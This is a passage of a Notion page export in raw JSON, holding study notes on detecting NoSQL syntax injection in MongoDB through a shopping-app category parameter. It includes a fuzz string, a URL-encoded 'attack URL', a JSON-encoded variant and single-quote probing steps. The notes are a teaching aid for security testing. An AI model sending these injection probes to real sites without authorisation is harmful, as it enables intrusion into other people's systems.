types.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-801f-95da-eec00a66a735","parent":{"type":"block_id","block_id":"24fdc9c5-3059-8095-bc4a-d0336cd40742"},"created_time":"2025-08-14T22:36:00.000Z","last_edited_time":"2025-08-14T22:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad","parent":{"type":"block_id","block_id":"24fdc9c5-3059-8095-bc4a-d0336cd40742"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"1. Detecting syntax injection in MongoDB","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"1. Detecting syntax injection in MongoDB","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"24fdc9c5-3059-80c2-b7ef-f5781c4107ba","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Suppose a shopping app shows products by category. Selecting ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Suppose a shopping app shows products by category. Selecting ","href":null},{"type":"text","text":{"content":"Fizzy drinks","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Fizzy drinks","href":null},{"type":"text","text":{"content":" triggers this URL:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" triggers this URL:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-80b4-b16e-c924c30db470","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"https://insecure-website.com/product/lookup?category=fizzy","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"https://insecure-website.com/product/lookup?category=fizzy","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"24fdc9c5-3059-80de-b605-dee9c51e0a51","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"The app sends this JSON query to MongoDB:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"The app sends this JSON query to MongoDB:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-8061-8ce6-f01ccb774e12","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"this.category == 'fizzy'","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"this.category == 'fizzy'","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"24fdc9c5-3059-80f7-afff-e0dcd8e43dc8","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"To test for injection, submit a ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"To test for injection, submit a ","href":null},{"type":"text","text":{"content":"fuzz string","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"fuzz string","href":null},{"type":"text","text":{"content":" in the ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" in the ","href":null},{"type":"text","text":{"content":"category","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"category","href":null},{"type":"text","text":{"content":" parameter. Example fuzz string for MongoDB:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" parameter. Example fuzz string for MongoDB:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-80fc-8565-dd95e1dd8443","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"'\"`{\n;$Foo}\n$Foo \\xYZ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"'\"`{\n;$Foo}\n$Foo \\xYZ","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"250dc9c5-3059-807c-911e-db084b9e2afa","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad"},"created_time":"2025-08-15T13:34:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"quote","quote":{"rich_text":[{"type":"text","text":{"content":"Fuzz strings:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Fuzz strings:","href":null},{"type":"text","text":{"content":" They are random-looking on purpose. You try many to see if the app mishandles any of them.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" They are random-looking on purpose. You try many to see if the app mishandles any of them.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-80cf-8060-e6850100a7b8","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Construct the attack URL:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Construct the attack URL:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-804c-bc16-e352c64da581","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"https://insecure-website.com/product/lookup?category='%22%60%7b%0d%0a%3b%24Foo%7d%0d%0a%24Foo%20%5cxYZ%00","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"https://insecure-website.com/product/lookup?category='%22%60%7b%0d%0a%3b%24Foo%7d%0d%0a%24Foo%20%5cxYZ%00","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"250dc9c5-3059-803e-8b3d-c437d6d7cc11","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad"},"created_time":"2025-08-15T13:36:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"If the app ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If the app ","href":null},{"type":"text","text":{"content":"crashes or behaves differently","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"crashes or behaves differently","href":null},{"type":"text","text":{"content":", you know your input is reaching the database unsanitized.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", you know your input is reaching the database unsanitized.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8072-aa75-f45fb8d6372e","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad"},"created_time":"2025-08-15T13:38:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"quote","quote":{"rich_text":[{"type":"text","text":{"content":"How did it become this long URL?","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"How did it become this long URL?","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-8091-ac2b-e6afb36876a0","parent":{"type":"block_id","block_id":"250dc9c5-3059-8072-aa75-f45fb8d6372e"},"created_time":"2025-08-15T13:38:00.000Z","last_edited_time":"2025-08-15T13:38:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"The attack URL is just the fuzz string URL-encoded so it can safely travel in an HTTP request.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"The attack URL is just the fuzz string URL-encoded so it can safely travel in an HTTP request.","href":null}],"icon":null,"color":"default"},"archived":false}]},{"object":"block","id":"24fdc9c5-3059-80f4-b98b-e7b5f133a895","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Note:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Note:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-80fe-93eb-c863f8ff52d5","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"NoSQL injection can appear in many contexts; adapt fuzz strings accordingly. Otherwise, you may simply trigger validation errors that mean the application never executes your query.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"NoSQL injection can appear in many contexts; adapt fuzz strings accordingly. Otherwise, you may simply trigger validation errors that mean the application never executes your query.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-8050-9f38-ce95c3c69333","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"URL-encode fuzz strings when injecting via the URL.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"URL-encode fuzz strings when injecting via the URL.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-80f2-9990-c736e09b4506","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"For JSON inputs, encode appropriately, e.g.,","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"For JSON inputs, encode appropriately, e.g.,","href":null}],"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-8029-959c-e71214508933","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80b0-93aa-d8efd27a47ad"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-15T14:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"'\\\"`{\\r;$Foo}\\n$Foo \\\\xYZ\\u0000","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"'\\\"`{\\r;$Foo}\\n$Foo \\\\xYZ\\u0000","href":null}],"language":"plain text"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-808a-af46-c9732a02e36d","parent":{"type":"block_id","block_id":"24fdc9c5-3059-8095-bc4a-d0336cd40742"},"created_time":"2025-08-15T13:39:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"2. Determining which characters are processed","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"2. Determining which characters are processed","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-8037-b84a-db8c53ac25b4","parent":{"type":"block_id","block_id":"250dc9c5-3059-808a-af46-c9732a02e36d"},"created_time":"2025-08-15T13:42:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"To see which characters affect the query, test them one at a time:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"To see which characters affect the query, test them one at a time:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8014-a235-cb426517329e","parent":{"type":"block_id","block_id":"250dc9c5-3059-808a-af46-c9732a02e36d"},"created_time":"2025-08-15T13:42:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Inject a single quote (","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Inject a single quote (","href":null},{"type":"text","text":{"content":"'","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"'","href":null},{"type":"text","text":{"content":"):","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"):","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-8056-b1e5-de7768d93d9b","parent":{"type":"block_id","block_id":"250dc9c5-3059-8014-a235-cb426517329e"},"created_time":"2025-08-15T13:42:00.000Z","last_edited_time":"2025-08-15T13:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"this.category == '''","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"this.category == '''","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"250dc9c5-3059-80aa-ab51-e9724335f460","parent":{"type":"block_id","block_id":"250dc9c5-3059-8014-a235-cb426517329e"},"created_time":"2025-08-15T13:42:00.000Z","last_edited_time":"2025-08-15T13:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If the page response changes or breaks, the ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If the page response changes or breaks, the ","href":null},{"type":"text","text":{"content":"'","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"'","href":null},{"type":"text","text":{"content":" probably disrupted the query syntax.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" probably disrupted the query syntax.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-802c-a09d-dfa210ce5a07","parent":{"type":"block_id","block_id":"250dc9c5-3059-808a-af46-c9732a02e36d"},"created_time":"2025-08-15T13:42:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Escape the quote to make it valid (","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Escape the quote to make it valid (","href":null},{"type":"text","text":{"content":"\\'","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"\\'","href":null},{"type":"text","text":{"content":"):","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"):","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-8011-bc35-fa9c359286f3","parent":{"type":"block_id","block_id":"250dc9c5-3059-802c-a09d-dfa210ce5a07"},"created_time":"2025-08-15T13:42:00.000Z","last_edited_time":"2025-08-15T13:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"this.category == '\\''","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"this.category == '\\''","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"250dc9c5-3059-809d-a6b7-e04e84c313d5","parent":{"type":"block_id","block_id":"250dc9c5-3059-802c-a09d-dfa210ce5a07"},"created_time":"2025-08-15T13:42:00.000Z","last_edited_time":"2025-08-15T13:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If this input works without error, it confirms the application accepts special characters and processes them directly.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If this input works without error, it confirms the application accepts special characters and processes them directly.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-8060-ab51-e71d17d0a851","parent":{"type":"block_id","block_id":"250dc9c5-3059-808a-af46-c9732a02e36d"},"created_time":"2025-08-15T13:42:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Key point:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Key point:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8008-a028-eda4f57085cd","parent":{"type":"block_id","block_id":"250dc9c5-3059-808a-af46-c9732a02e36d"},"created_time":"2025-08-15T13:42:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"A syntax error means your input is being interpreted by the database.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"A syntax error means your input is being interpreted by the database.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80c2-8cee-e7dfa07ddead","parent":{"type":"block_id","block_id":"250dc9c5-3059-808a-af46-c9732a02e36d"},"created_time":"2025-08-15T13:42:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If you can send special characters without breaking things, the app may be ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If you can send special characters without breaking things, the app may be ","href":null},{"type":"text","text":{"content":"vulnerable to injection","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"vulnerable to injection","href":null},{"type":"text","text":{"content":", because your input isn't being filtered or sanitized.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", because your input isn't being filtered or sanitized.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-809b-80bc-f59444a8d589","parent":{"type":"block_id","block_id":"250dc9c5-3059-808a-af46-c9732a02e36d"},"created_time":"2025-08-15T13:51:00.000Z","last_edited_time":"2025-08-15T14:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"quote","quote":{"rich_text":[{"type":"text","text":{"content":"If it’s Vulnerable?","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If it’s Vulnerable?","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-80e6-b4a4-cb7bb939f23f","parent":{"type":"block_id","block_id":"250dc9c5-3059-809b-80bc-f59444a8d589"},"created_time":"2025-08-15T13:51:00.000Z","last_edited_time":"2025-08-15T16:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"The ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"The ","href":null},{"type":"text","text":{"content":"'","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"'","href":null},{"type":"text","text":{"content":" causes an error and the ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" causes an error and the ","href":null},{"type":"text","text":{"content":"\\'","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"\\'","href":null},{"type":"text","text":{"content":" remove the error its a sign for injection vulnerability.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" remove the error its a sign for injection vulnerability.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-804d-abca-ee0b0f757f8f","parent":{"type":"block_id","block_id":"250dc9c5-3059-809b-80bc-f59444a8d589"},"created_time":"2025-08-15T13:51:00.000Z","last_edited_time":"2025-08-15T13:51:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80b3-908e-f23cdd65c8f1","parent":{"type":"block_id","block_id":"250dc9c5-3059-809b-80bc-f59444a8d589"},"created_time":"2025-08-15T13:51:00.000Z","last_edited_time":"2025-08-15T13:52:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"If the site is NOT vulnerable?\nCase 1 – You submit '","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If the site is NOT vulnerable?\nCase 1 – You submit 